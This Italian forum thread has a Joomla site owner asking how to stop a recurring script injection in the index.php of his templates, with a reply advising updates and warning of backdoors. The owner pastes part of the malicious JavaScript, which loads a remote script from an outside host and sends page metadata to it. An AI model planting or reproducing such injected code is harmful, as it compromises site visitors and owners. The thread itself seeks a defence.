Joomla.it Forum

Joomla! 3 => Installazione, migrazione e aggiornamento => : giuseppe121 20 Jun 2016, 09:57:52

: sicurezza joomla 2.5/3 e script inject
: giuseppe121 20 Jun 2016, 09:57:52
Salve a tutti,
c'e' qualche protezione che potrei implementare per evitare che in tutti i template la pagina index.php  venga attaccata per inserire questo codice:


<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://stolarz.home.pl/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://stolarz.home.pl/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas






grazie

: Re:sicurezza joomla 2.5/3 e script inject
: alexred 20 Jun 2016, 10:17:09
su Joomla 2.5 c'è ben poco da fare, è una versione obsoleta che non è più supportata e con bug noti di sicurezza, quindi facile da "bucare" per i malintenzionati che vogliono modificare i file del tuo sito.
Su Joomla 3 devi mantenere aggiornata la versione di Joomla all'ultima disponibile (ad oggi la 3.5.1) e tutte le estensioni esterne installate aggiornate alle ultime versioni disponibili.

Poi però devi anche valutare che se sono già riusciti a "bucarti" il sito perchè non era aggiornato ed ora sono dentro possono aver inserito una loro porta di accesso ed anche se aggiorni continueranno ad entrare.
: Re:sicurezza joomla 2.5/3 e script inject
: giuseppe121 20 Jun 2016, 10:34:03
Ciao,
grazie per la risposta.
su joomla 3 aggiornato con tutti i template ed i plugin, ritrovo continuamente questo script.
Non riesco a risolvere attivando qualche modulo di sicurezza oppure il file.htaccess con qualche direttiva precisa?


grazie